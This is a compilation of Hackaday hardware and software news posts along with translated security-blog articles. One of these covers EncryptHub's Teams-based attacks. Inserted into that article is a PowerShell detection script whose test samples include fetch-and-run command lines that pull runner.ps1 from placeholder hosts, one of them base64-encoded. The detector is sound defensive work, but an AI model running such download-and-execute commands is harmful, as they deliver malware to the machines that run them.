To sense this oscillation, [Tim] originally used a phototransistor to detect the flame’s light, but he wanted an even simpler solution. He positioned a wire just above the flame, so that as it flickered it would periodically contact the wire. A flame has a different dielectric constant than air does, so the capacitance between this and another wire wrapped around the bundle of candles fluctuates with the flame. To sense this, he used a CH32V003 microcontroller, which reads capacitance, performs some signal processing to get a clean signal, counts oscillations, and uses this time signal to blink an LED once a second. The final result is unusually mesmerizing for a blinking LED.

In something of the reverse of this project, we’ve also seen an oscillator used for an (artificial) candle. There’s also a surprising amount of science that can be learned by studying candles.

youtube.com/embed/nNFMftN1w9s?…


hackaday.com/2025/08/17/2025-o…


Recto: In Case Programming isn’t Hard Enough


There’s long been a push to stop writing code as a sequence of lines and go to something graphical, which has been very successful in some areas and less so in others. But even when you use something graphical like Scratch, is it really standing in for lines of code? Many graphical environments are really just interface builders, and you still write traditional code underneath. [Masato Hagiwara] asks the question: Can you write code that is actually a 2D graphic? Where the graphical layout isn’t a cover for code, but is the code itself? His answer is Recto.

Whereas a C program, for example, has a syntactical structure of lines, a Recto program has rectangles. Rectangles can contain data, and their structure naturally mimics the kinds of structures we usually use: columns, rows, matrices, and so on. Rectangles can also contain… wait for it… other rectangles. Special rectangles act as dictionaries or sets.

We thought this sort of reminded us of Lisp, and, in fact, [Hagiwara] makes that clear later in the post. The real problem is how do you…write? draw?… this kind of code? At first, he laid it out in a spreadsheet before compilation. Now he’s built an editor for it, and you can try it in your browser. There’s also a limited-feature compiler that can handle simple programs.

[Hagiwara] goes on to show how this representation would work for natural human languages, too. Honestly, we have enough trouble with English and the few other human languages we struggle with, but it is interesting to contemplate.

If you like strange languages, there’s Piet. Not that either of these is the weirdest we’ve ever seen.


hackaday.com/2025/08/17/recto-…


Llama Habitat Continues to Expand, Now Includes the PSP


Sony PSP, Evan-Amos, Public Domain.

Organic Llamas have a rather restricted range, in nature: the Andes Mountains, and that’s it. Humans weren’t content to let the fluffy, friend-shaped creatures stay in their natural habitat, however, and they can now be found on every continent except Antarctica. The Llama2 Large Language Model is like that: while it may have started on a GPU somewhere, thanks to enterprising hackers like [Caio Madeira], who has ported Llama2 to the PlayStation Portable (PSP), the fluffiest LLM can be found just about anywhere.
The AI, in all its glory, dooming yet another system.
Ultimately this project has its roots in Llama2.c by [karpathy], a project we’ve seen used on Pentium II under Windows 98, DOS machines running 486 processors, and even the venerable Commodore 64, of all impossible things. Now, it’s the PSP’s turn. This implementation uses the same 260K tinystories model as the C64 port, upon which it is based. Of course the PSP’s RAM has room for a much larger model, but [Caio] apparently prefers to run the tiny model faster on this less-ancient gaming hardware.

It’s getting to the point that it’s harder to find systems that won’t run LLMs than those that do. Given that Llama2 seems to be the new DOOM, it’s probably only a matter of time before their virtual fur is all over all our old equipment. Fortunately for allergy sufferers, virtual fur cannot trigger a histamine response.

If you know of another system getting LLMs (Alpaca-adjacent or otherwise), send in a tip.


hackaday.com/2025/08/17/llama-…


It’s a Pi, But it’s not Quite a Raspberry Pi


When is a Raspberry Pi not a Raspberry Pi? Perhaps when it’s a Pi Zero-shaped board with an RP3A0 SoC from a Raspberry Pi Zero 2, made by [jonny12375].

Back in the early days of the Raspberry Pi, there was an offering from the Korean manufacturer Odroid, which wasn’t merely a similar machine with a different SoC, but a full clone in a smaller form factor featuring the same BCM2385 chip as the original. It was electrically and software-wise identical to the real thing, which we suspect didn’t go down very well with the Pi folks in Cambridge. The supply of Broadcom chips dried up, and ever since then the only way to get a real Pi has been from the official source. That’s not quite the end of the unofficial Pi story though, because a few hardy experimenters have made Pi clones like this one using chips desoldered from the real thing.

It’s the fruit of a reverse-engineering project to find the chip’s pinout, and it’s a proof of concept board rather than the intended final target of the work. The process involved painstakingly sanding down each layer of a Zero 2 board to reveal the traces and vias. The current board has a few quirks but it boots, making this an impressive piece of work on all counts. We’re looking forward to seeing whatever the final project will be.

If you’re hungry for more Pi-derived goodness, we’ve also seen one using the part from a Pi 3.


hackaday.com/2025/08/17/its-a-…


Commodore is Back Selling New C64s, but Should You Buy them?


It’s hard to argue with nostalgia, but you can toss a bucket of cold facts over it. In the case of the recent rescuing of the Commodore brand from the clutches of relabeling of generic electronics by [Perifractic] of Retro Recipes, we got [The Retro Shack] doing the proverbial bucket dumping in a new video. Basically the question is whether the fresh Commodore 64 offerings by the new-and-improved Commodore are what you really want, or need.

The thing is that over the decades many people have created all the bits that you need to build your own classical C64, or even buy one off-the-shelf, with people like [bwack] having reverse-engineered the various C64 mainboards. These can be populated with drop-in replacements for chips like the SID, VIC-II, CIAs and others that are readily available, along with replica cases and keyboards. If you crave something less bulky and complex you can run a bare metal C64 emulator like BMC64 on a Raspberry Pi, or just run the VICE emulator on your platform of choice. There’re also options like the full-sized TheC64 and Ultimate 64 Elite II systems that you can buy ready to go.

Basically, there is a whole gamut of ways to get some part of the C64 experience, ranging from emulator-only to a full hardware DIY or pre-assembled format, each of which comes with its own price tag, starting at $0 for running VICE on your existing system. With so much choice we can only hope that the renewed Commodore company will become something more than Yet Another C64 Experience.

youtube.com/embed/qz8EzWTb4so?…


hackaday.com/2025/08/17/commod…


Microsoft Teams Increasingly in the Crosshairs. EncryptHub Compromises Corporate Networks with Malware


In recent years Microsoft Teams has become one of the most widely used collaboration tools in companies, turning into a strategic channel not only for communication but also for managing documents, meetings and operational processes.

This growing centrality, however, has not gone unnoticed by cybercriminals, who are developing increasingly sophisticated attack and social engineering techniques on this very platform, with the aim of infiltrating corporate networks and stealing sensitive information. The combination of implicit trust in the tool and the high volume of daily communications creates fertile ground for targeted compromise campaigns.

An emblematic example is the cutting-edge social engineering operation orchestrated by the malicious group EncryptHub, which has fielded a perverse strategy that fuses spoofing techniques with targeted technical exploits. As anticipated in yesterday’s analysis, this is an advanced campaign that jointly exploits impersonation tactics and technical attack vectors, thereby significantly compromising the security of corporate infrastructure.

This new approach, impersonating IT staff, shows how the boundaries between social engineering and technical attacks are thinning, opening up increasingly complex scenarios for cyber defence.

The attack begins with the threat actors claiming to belong to internal IT departments and sending Microsoft Teams connection requests to targeted employees.

Once victims accept the request and establish a remote session, the attackers guide them through running PowerShell commands that appear legitimate but actually download and execute malicious scripts.

The initial command bypasses Windows security policies and downloads a PowerShell script named “runner.ps1” from attacker-controlled domains such as cjhsbam[.]com.

This script is designed to exploit CVE-2025-26633, a vulnerability in Microsoft’s Management Console framework dubbed “MSC EvilTwin”.

CVE-2025-26633 was officially disclosed as a zero-day vulnerability in March 2025, although examples of related attacks had been observed in the wild as early as February 2025. Microsoft has since released security patches, but the vulnerability continues to be actively exploited against unpatched systems.

The vulnerability has a CVSS score of 7.0, indicating high severity, and has been added to CISA’s Known Exploited Vulnerabilities catalog, underscoring its critical nature for federal agencies and enterprise environments.

The campaign highlights the persistent effectiveness of social engineering attacks combined with technical exploitation. “Social engineering remains one of the most effective tools in a cybercriminal’s arsenal, and the emerging group EncryptHub has quickly joined this trend,” Trustwave researchers noted.

Cybersecurity experts recommend implementing multi-layered defence strategies, including immediate patching of CVE-2025-26633, enhanced monitoring of Microsoft Management Console activity, and comprehensive user awareness training focused on social engineering tactics.

Organizations should also restrict remote access capabilities and implement strict verification procedures for interactions with IT support.
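Detection logic for the initial PowerShell step described above (a policy bypass combined with a remote script download), as an added example that is not from Trustwave or the original article. The trusted-domain list, the hosts and all sample command lines are constructed; only the script name runner.ps1 comes from the article.

```python
import base64
import ntpath
import re
from urllib.parse import urlparse

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
TRUSTED_DOMAINS = ("corp.example",)  # assumption: the organisation's own script hosts

# PowerShell accepts abbreviated parameter names (-ep, -exec, -enc, ...).
POLICY_BYPASS = re.compile(r"(?<!\S)-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.I)
ENCODED_ARG = re.compile(r"(?<!\S)-(?:e|ec|enc\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)
REMOTE_FETCH = re.compile(
    r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile"
    r"|start-bitstransfer)\b", re.I)
IN_MEMORY_EXEC = re.compile(r"\b(?:invoke-expression|iex)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.I)


def expand_encoded(command_line):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return command_line
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers invalid base64 and invalid UTF-16
        return command_line
    return command_line + " " + decoded


def untrusted_hosts(text):
    """Hosts of all URLs in text that fall outside TRUSTED_DOMAINS, in order seen."""
    hosts = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        trusted = any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)
        if host and not trusted and host not in hosts:
            hosts.append(host)
    return hosts


def verdict(image, command_line):
    """Return (severity, tags) for one process-creation record."""
    if ntpath.basename(image).lower() not in POWERSHELL_HOSTS:
        return "ok", []
    text = expand_encoded(command_line)
    tags = []
    if POLICY_BYPASS.search(text):
        tags.append("policy_bypass")
    if REMOTE_FETCH.search(text):
        tags.append("remote_fetch")
    if IN_MEMORY_EXEC.search(text):
        tags.append("in_memory_exec")
    hosts = untrusted_hosts(text)
    tags += ["untrusted_host:" + host for host in hosts]
    if "policy_bypass" in tags and "remote_fetch" in tags and hosts:
        return "high", tags
    return ("review" if tags else "ok"), tags


# Constructed sample records (image path, command line); hosts are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/runner.ps1')"
B64 = base64.b64encode(ENCODED_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    (PS, r'powershell.exe -ExecutionPolicy Bypass -Command "iwr https://cdn.untrusted.example/runner.ps1 | iex"'),
    (PS, "powershell.exe -ep bypass -enc " + B64),
    (PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
    (PS, r'powershell.exe -ExecutionPolicy Bypass -Command "iwr https://deploy.corp.example/agent.ps1 -OutFile agent.ps1"'),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\Public\notes.txt"),
]

if __name__ == "__main__":
    for image, command_line in SAMPLE_EVENTS:
        print(verdict(image, command_line))
```
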

The article Microsoft Teams Increasingly in the Crosshairs. EncryptHub Compromises Corporate Networks with Malware comes from il blog della sicurezza informatica.


A Second Chance for the Single Wheel Monorail?


Meccano model of a Brennan's monorail

Lately, this peculiar little single wheel monorail, built by [extraglide1976] entirely from Meccano, came to our attention. His build started with modest tests: one gyro obviously flopped. Two gyros geared together ran slightly better. But when he added active gimbal control, things suddenly came to life – the model shudders, catches itself, and carries on. The final green-roofed locomotive, with LEDs signalling ‘system go’, trundles smoothly along a single rail on [extraglide1976]’s deck.

To be fair, it houses a lot of mechanics and engineering which we don’t find in the monorails of today. We do have quite a few monorails in our world, but none of them balance on a single wheel like this one. So, where did this invention derail?

Outside of theme parks, Japan is one of the few countries where monorails are still used as serious urban transport: though Germany’s century-old Wuppertal Schwebebahn, the lesser-known C-Bahn, China’s sprawling Chongqing and Shanghai systems, Malaysia’s Kuala Lumpur line, Brazil’s São Paulo network, the US links in Seattle and Las Vegas, and India’s Mumbai Monorail prove the idea has quietly taken root elsewhere.

The thing you’ll see in nearly all these monorails is how the carriages are designed to clamp onto the tracks. This is of course the safest option, but it loses out on speed to the ones that sit on top of the tracks, balancing on one wheel. Such a train was actually invented, in 1910, by Louis Brennan. His original monorail promised faster, cheaper transport, even using existing rails. The carriages leaned into turns like a motorbike, without any intervention from the driver. Two counter-rotating gyroscopes kept the carriage upright, cancelling precession forces like a mechanical Jedi trick.

Back then, it failed commercially, but today? With cheap sensors, brushless motors, microcontrollers, and intelligent software, why not let it make a comeback? It could carry freight through narrow urban tunnels. With high-speed single-rail pods?

Investors killed Brennan’s idea, but we live in a different time now. You could start out with a gimmicky ‘snacks and beer’ highline from your fridge to your garage. Share your take on it in the comments!

youtube.com/embed/AYsdJt8CIVE?…


hackaday.com/2025/08/16/a-seco…


From Smartphone to a Home Server


Some people like their homelabs to be as big and fancy as possible, with racks of new or surplus server hardware sucking down power. [Hardware Haven] evidently has the opposite idea, given he just made a video about making the cheapest, smallest server possible: an Android phone.

Sure, it’s not going to be streaming terabytes of data at multiple gigabytes per second, but that’s not everyone’s use case. Don’t forget, flagship phones had multiple cores and gigabytes of RAM a decade ago, so even an old and busted smartphone has more than enough power for something like Home Assistant, which is what gets installed in this video.

After considering loading termux and rooting his device for Docker-on-Android, he opted for postmarketOS, the premier Linux for old smartphones. That’s not because the Linux environment you get with termux wouldn’t work; it’s just that he wanted something native. To that end, he bought a somewhat worse-for-wear Xiaomi Mi A1 from eBay to get hardware Alpine-based postmarket could use.

Software wise, it was just a matter of following instructions and reading manuals — Linux is Linux, after all. The firewall proved to be his main challenge, though trying to branch out from Home Assistant to run Minecraft Server did run into Java issues [Hardware Haven] had no interest in troubleshooting. Hardware wise, though, well — do you want to leave a phone plugged in permanently? Smokey the Bear suggests you not, especially if you live near a forest. Besides, you probably don’t want your server on WiFi, and at least this smartphone wouldn’t charge when using a networking dongle.

That meant phone surgery: the battery came out, and 5 V from an old USB charger was piped into the battery charge controller via a diode. The diode was used for its voltage drop, to bring the 5 V supply down to a believable battery voltage — a buck converter might have been better, but you use what you have, and the diode drop doesn’t dissipate much power. Power dissipation is still one watt at idle, six during a stress test.

Given how cheap the phone was, and how little power this thing sips, [Hardware Haven] has an excellent answer to those who say homelabbing is a rich person’s hobby. This project also reminds us that while our phones might not be as hackable as we’d like, they’re still far from totally locked down. You can even run NixOS on (some of) them.

youtube.com/embed/OBOoDffWF0Y?…


hackaday.com/2025/08/16/from-s…


MorPhlex: The TPU Filament That Goes Soft After You Print It


In FDM 3D printing circles TPU is a bit of a special filament. Not so much because of its properties, but because it’s rather stretchy even as a filament, which makes printing certain hardness grades of TPU in particular somewhat of a nightmare. An interesting new contender here comes from a company called BIQU, who reckon that their ‘MorPhlex’ TPU solves many of those problems. Recently the [ModBot] channel on YouTube got sent a spool of the filament for testing.
The BIQU MorPhlex TPU filament being turned into squishy slippers. (Credit: ModBot, YouTube)
The ‘magic’ here is that this TPU claims to be a 90A TPU grade while on the spool, but after printing it becomes 75A, meaning a lot softer and squishier. Perhaps unsurprisingly, a big selling point on their product page is that you can print squishy shoes with it. Beyond this it claims to be compatible with ‘most FDM printers’, and the listed printing parameters are typical for TPU in terms of extruder and bed temperature.

After drying the filament as recommended for TPU in general, test prints were printed on a Bambu Lab H2D. Here BIQU recommends not using the AMS, but rather the dedicated TPU feeding channel. For the test prints some slippers were printed over the course of two days. In hindsight glue stick should have been applied to make parts removal easier.

The slippers were indeed squishy, but the real test came in the form of a Shore A hardness meter and some test cube prints. This showed 80 – 85A for the BIQU MorPhlex test cube, depending on whether the side or the top was tested. As the product datasheet indicates a final hardness of 75A +/- 3A, one could argue that it’s kind-of in spec, but it mostly raises questions on how parameters like temperature and extrusion speed affect the final result.

youtube.com/embed/gC49WgtZfnI?…


hackaday.com/2025/08/16/morphl…


2025 One Hertz Challenge: STM32 Blinks In Under 50 Bytes


Many of us have run a Blink program on a microcontroller before. It’s effectively the “Hello, World!” of the embedded space. However, few of us have ever thought about optimizing our Blink code to be as minuscule as possible. But that’s precisely what [Rudra Lad] did for this entry into the 2025 One Hertz Challenge!

This example of Blink, delay_blinky_13, is built specifically for the STM32F4 Discovery microcontroller development board. [Rudra] notes the code is “highly optimized” and compiles down to a binary size of under 50 bytes. The code doesn’t even use RAM, and it aims to get the blink as close to 1 Hz as possible. Many optimizations were used to crunch it down as small as possible. For example, the standard startup code isn’t used, with the entire program instead written in the Reset_Handler to save space. Bit-band is also used to write to peripheral registers to blink the LED, since this uses fewer instructions than the typical methods. Meanwhile, with many tweaks to the delay counting routine, [Rudra] was eventually able to get the blink frequency to 1.00019 Hz, as measured on a logic analyzer. That’s pretty darn close!

While it’s rare that you have only 50 bytes of binary space to blink an LED, work like this is a great way to flex your coding muscles. Code is on Github for the curious, and if you’ve worked up your own impressive tiny binaries, don’t hesitate to let us know!

2025 Hackaday One Hertz Challenge


hackaday.com/2025/08/16/2025-o…


The Nibbler was Quite a Scamp


The late 1970s were an interesting time for microcomputers. The rousing success of things like the 8080, the Z80, the 6800, and the 6502 made everyone want a piece of the action. National Semiconductor produced its SC/MP. That was technically the Simple Cost-effective Micro Processor, but it was commonly known as Scamp. There were several low-cost development boards built around this processor and [Hello World] is looking at Digikey’s “Nibbler” which was a fairly nice computer for only $150. Check it out in the video below.

The SC/MP was made to be cheap. It had a strange bank switching scheme reminiscent of the Microchip PIC 16F family. It also had, like a lot of old discrete computers, a serial ALU, which made it slower than many of its contemporaries. It did have good features, though. It was cheap and required very few extra parts along with a single 5 V supply in the second and subsequent versions. In addition, it had pins that were made for connecting more than one CPU, which was quite a feat for those days.

[Hello World] mentions that you don’t hear much about the SC/MP anymore and, in fact, we had all but forgotten about it. There is an effort underway to recreate the plucky little computer for anyone who wants to build a new one.

The $150 price tag seems reasonable, at least compared to other computers of the day. However, don’t forget that you still need a power supply, probably a card cage, and the biggest problem of all: a terminal. It is hard to remember how difficult it used to be to get your hands on a terminal at a reasonable cost. Your main choices were a TV typewriter or something surplus like a TeleType.

youtube.com/embed/Sbxy7Ob3hkI?…

youtube.com/embed/wK-WTeWHFic?…


hackaday.com/2025/08/16/the-ni…


Metric, Imperial, and Flexibility


Al Williams wrote up a seemingly innocent piece on a couple of rules-of-thumb to go between metric and US traditional units, and the comment section went wild! Nothing seems to rile up the Hackaday comment section like the choice of what base to use for your unit system. I mean, an idealized version of probably an ancient Egyptian’s foot versus a fraction of the not-quite-right distance from the North Pole to the equator as it passes through Paris? Six of one, half a dozen the other, as far as I’m concerned. Both are arbitrary.

What’s fun, though, is how many of us need to know both systems and how schizophrenic it all can be. My favorite example is PCB layout, where tenths and thousandths of an inch are unavoidable in through-hole and surface-mount parts, yet we call out board sizes and drill bits in millimeters – on the same object, and without batting an eye. American 3D printer enthusiasts will know their M3 hardware, and probably even how much a kilogram weighs, because that’s what you buy spools of filament in. Oddly enough, though I live in Europe, I have 3/4” thread on my garden hose and a 29” monitor on my desk. Americans buy two liter bottles of soda without thinking twice.

The absolute kings of this are in the UK, where the distance between cities is measured in miles, but the dimensions of an apartment in meters. They’ll buy gas in liters and beer in pints. Humans are measured both in feet-and-inches and centimeters, and weighed in pounds, kilograms, or even stone.

And I think that’s just fine. Once you give up on the rightness of either system, they both have their pros and cons. Millimeters are superb for doing carpentry in – that’s just about how tight my tolerances are with hand tools anyway, and if it’s made of wood, you can fudge 0.5 mm either way pretty easily. Sure, you could measure in 32nds of an inch, but have you ever bought a plywood sheet that’s 1536 x 3072 thirty-seconds? (That’s 4’ x 8’, or 1200 mm x 2400 mm.) No, you haven’t.

But maybe stick to one system when lives or critical systems are on the line. Or at least be very careful to call out your units. While it’s annoying to spec the wrong SMT part size because KiCAD calls some of them out in millimeters and inches – 0402 in inches is tiny, but 0402 in metric is microscopic – it’s another thing entirely to load up half as much fuel as you need for a commercial airline flight because of metric vs imperial tons. There’s a limit to how units-flexible you want to be.

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!


hackaday.com/2025/08/16/metric…


How to Convert a Drain into a Hydropower Facility


Three stages of the dam construction

Over on his YouTube channel [Construction General] shows us how to convert a drain into a hydropower facility. This type of hydroelectric facility is known as a gravitation water vortex power plant. The central structure is a round basin which includes a central drain. The water feeds into the basin through a series of pipes which help to create the vortex which drives the water turbine before flowing out the drain.

To make the facility [Construction General] starts by laying some slabs as the foundation. One of the slabs has a hole to which the central drain pipe is attached. Bricks and mortar are then used to build the basin around the drain. A temporary central pipe is used for scaffolding along with some strings with hooks attached to hold the bricks and mortar in place for the basin. Integrated into the top half of the basin are fifteen inlet pipes which feed in water at an angle.

The next step is to build the dam wall. This is a bricks and mortar affair which includes the drain in the bottom of the wall and two spillways at the top. The spillways are for letting water flow out of the dam if it gets too full. Around the drainage in the dam wall a valve is installed. This valve is called the low-level outlet or the bottom outlet, and in this case it is a sluice, also known as a slide gate, which can be raised or lowered to control the rate of flow through the turbine.

Once the basin is complete and the low-level outlet is in place the scaffolding is removed. The basin is then painted, pink on the inside and white around the top. A turbine is constructed from various metal pieces and installed into the basin. The turbine is attached to a generator which is fixed atop the basin. The apparatus for operating the low-level outlet is installed and the dam is left to fill.

Hydropower is a topic we’ve covered here at Hackaday before. If you’re interested in the topic you might like to check out A Modest But Well-Assembled Home Hydropower Setup, Hydropower From A Washing Machine, or Bicycle Hub Hydropower.

youtube.com/embed/PImEWUq07i0?…


hackaday.com/2025/08/16/how-to…


Walter is a Tiny Cellular Modem For Your Projects


It wasn’t that long ago that projects with cellular connectivity were everywhere, but with 2G no longer universally available, the glory days of cheap 2G modules seem to be on their way out. So when [Data Slayer] titled his video “You’ve Never Seen Cellular Like This” about a new GSM radio module, we couldn’t help but think that we have — and that we’re glad to see it back.

The module is the Walter, by DPTechnics out of Belgium. It’s fully open-source and contains an ESP32-S3 for WiFi and BLE plus a Sequans Monarch chip for GSM and GNSS connectivity. It’s not the blazing-fast 5G you’re paying your phone carrier for: this is an IoT modem, with LTE-M and NB-IoT. We’re talking speeds in the kbps, not Mbps, but we’re also talking very, very low power usage. Since it’s LTE-M rather than full LTE, you’re probably not going to be bringing back the golden days of Arduino Cellphones (since LTE-M doesn’t support VoLTE), but if LoRa isn’t your jam, and you hang out around cell towers, this level of connectivity might interest you.

Walter is actually a drop-in replacement for PyCom’s old GPy module, so if you had a project in mind for that and are frustrated by it being EoL — well, here you are. [Data Slayer] seemed impressed enough with its capabilities as a GPS tracker. We’re impressed with the 9.8 µA consumed in deep sleep mode, and the fact that it has already been certified with the CE, FCC, IC, RCM and UKCA. Those certs mean you could go from prototype to product without getting tangled in red tape, assuming Walter is the only radio onboard.

Our thanks to [Keith Olson] for phoning in the tip. If you have a tip and want to connect, operators are standing by.

youtube.com/embed/6QUVzvhEhu4?…


hackaday.com/2025/08/16/walter…


This Polaroid-esque OCR Machine Turns Text to Braille in the Wild


A black and white device sits on a beige table. A white rotary knob projects out near the base of its rectangular shape nearest the camera. Near it is a black rectangular section of the enclosure with six white dots protruding through holes to form a braille display. A ribbon cable snakes out of the top of the enclosure and over the furthest edge of the device, presumably connecting to a camera on the other side of the device.

One of the practical upsides of improved computer vision systems and machine learning has been the ability of computers to translate text from one language or format to another. [Jchen] used this to develop Braille Vision which can turn inaccessible text into braille on the go.

Using a headless Raspberry Pi 4 or 5 running Tesseract OCR, the device has a microswitch shutter to take a picture of a poster or other object. The device processes any text it finds and gives the user an audible cue when it is finished. A rotary knob on the back of the device then moves the braille display pad through each character. When the end of the message is reached, it then cycles back to the beginning.

Development involved breadboarding an Arduino hooked up to some MOSFETs to drive the solenoids for the braille display until the system worked well enough to solder together with wires and perfboard. Everything is housed in a 3D printed shell that appears similar in size to an old Polaroid instant camera.

We’ve seen a vibrating braille output prototype for smartphones, how blind makers are using 3D printing, and are wondering what ever happened with “tixel” displays? If you’re new to braille, try 3D printing your own trainer out of TPU.

youtube.com/embed/EfGsyqIRnGQ?…


hackaday.com/2025/08/15/this-p…


Suggested Schematic Standards


We often think that if a piece of software had the level of documentation you usually see for hardware, you wouldn’t think much of it. Sure, there are exceptions. Some hardware is beautifully documented, and poorly documented software is everywhere. [Graham Sutherland’s] been reviewing schematics and put together some notes on what makes a clean schematic.

Like coding standards, some of these are a bit subjective, but we thought it was all good advice. Of course, we’ve also violated some of them when we are in a hurry to get to a simulation.

Most of the rules are common sense: use enough space, add labels, and avoid using quirky angles. [Flannery O’Connor] once said, “You can do anything you can get away with, but nobody has ever gotten away with much.” She was talking about writing, but the same could be said about schematics.

[Graham] says as much, pointing out that these are more guidelines. He even points out places where you might deliberately break the rules. For example, in general, wires should always go horizontally or vertically. However, if you are crossing two parallel wires, you probably should break that rule.

So what are your schematic rules? Software has standards like MISRA, CERT, and various NASA standards. Oddly enough, one of our favorite quick schematic editors is truly terrible but obeys most of these rules. But you can surely do better than that.


hackaday.com/2025/08/15/sugges…


2025 One Hertz Challenge: Educational Tool Becomes 10 Stopwatches


Around the globe, some classrooms are using fancy digital handheld devices to let people answer questions. One such example of this hardware is the Smart Response PE. These devices are largely useless outside the classroom, so [Ray Burne] decided to hack one for our 2025 One Hertz Challenge.

The Smart Response PE device is similar in shape and size to an old-school candybar cellphone. It runs on a Texas Instruments CC2533 microcontroller, which drives a simple black-and-white LCD. User interface is via a numeric keypad and a few extra control buttons on the front panel. Thanks to Github user [serisman], there are readily available development tools for this hardware. [Ray] notes it provides a straightforward Arduino-like programming experience.

[Ray] decided to modify the hardware to act as a stopwatch. But not just one stopwatch—ten stopwatches at once! Pressing a number from 0 to 9 will activate that given timer, and it will start ticking up on the LCD screen. One can pause the screen updates to get a temporary laptime reading by pressing the enter key. Meanwhile, pressing the Home button will reset the screen and all timers at once. [Ray] also explains on the project page how to add a real power switch to the device, and how to modify the programming pins for easy access.

It’s a fun build, and one that could prove useful if you regularly find yourself having to time ten of something at once. Maybe eggs? In any case, it’s certainly easier than juggling ten separate stopwatches at once! Meanwhile, if you’re hacking your own obscure hardware finds, don’t hesitate to notify the tipsline!

2025 Hackaday One Hertz Challenge


hackaday.com/2025/08/15/2025-o…


While the N2 Mesmerizes the World and Sells 1000 Units, a Domestic Robot Will Be in Every Home Within 5 Years


The young Chinese founder Jiang Zheyuan, just 27 years old, leads the startup Songyan Dynamics, which specializes in humanoid robots. With about 140 employees, Jiang personally oversees every aspect of the company, from technology development to production.

The flagship robot, the N2, 120 cm tall, became known to the general public in April, when it took second place in Beijing’s robot half marathon, broadcast live across China. This result, combined with the competitive price of 39,000 yuan (about 4,600 euros), has fueled the company’s image as the “Xiaomi of robotics”.

Founded in September 2023, Songyan Dynamics developed a working humanoid robot prototype in less than a month, quickly attracting funding from private investors and the Beijing government. In its first months, however, the company struggled to find customers and faced a financial crisis, with almost nonexistent sales and rising costs. The lack of a sales and marketing team pushed Jiang to focus efforts exclusively on hardware innovation, betting on spectacular features to capture the market’s attention.

The winning choice was to develop the robot’s ability to perform backflips, one of the most complex movements for a humanoid. In March, Songyan Dynamics released a video of the N2 performing several consecutive backflips, demonstrating advanced balance and coordination. The performance, together with a price half that of its main competitor Unitree, gave the company a significant competitive advantage and immediate visibility.

Taking part in the April marathon was a decisive showcase for Songyan Dynamics. For an entire month, the team worked nonstop to improve the N2’s endurance, allowing it to finish the race and consolidate its reputation as a stable and reliable robot. The competition showed that its performance was not confined to the laboratory but could be replicated in demanding, real-world settings.

The media and technical success translated into an unprecedented commercial boom: within a month of the race, orders arrived for more than 1,000 units. This result transformed the company, quickly carrying it past its initial period of difficulty and opening up prospects for expansion in both the Chinese and international markets.

The valuation of Songyan Dynamics has soared, from about 300 million yuan at the start of the year to 2 billion yuan in June. Looking ahead, Jiang Zheyuan has already set the next goal: to develop a household cleaning robot within five years, aiming to replicate the media and commercial impact achieved with the N2, but in a sector with very high market potential.

The article While the N2 Mesmerizes the World and Sells 1000 Units, a Domestic Robot Will Be in Every Home Within 5 Years comes from il blog della sicurezza informatica.


Liberating a Collapsible Chair from a Single Piece of Wood


A before and after with the plank of wood shown and the resulting chair also shown.

Over on his YouTube channel our hacker [GrandpaAmu] liberates a collapsible chair from a single piece of wood.

With the assistance of an extra pair of hands, but without any power tools in sight, this old master marks up a piece of wood and then cuts a collapsible chair out of it. He uses various types of saw, chisels, a manual drill, and various other hand tools. His workspace is a humble plank with a large clamp attached. At the end he does use a powered hot air gun to heat the finish he uses to coat the final product.

We love videos like this which communicate, record, and capture old know-how. Even in our electrified future with factory-made commodities everywhere, we’re all still gonna appreciate having something portable to sit on. If you’re interested in collapsible furniture you might also be interested in The Ultimate Workstation That Folds Up.

youtube.com/embed/sRjwTCYU4iE?…


hackaday.com/2025/08/15/libera…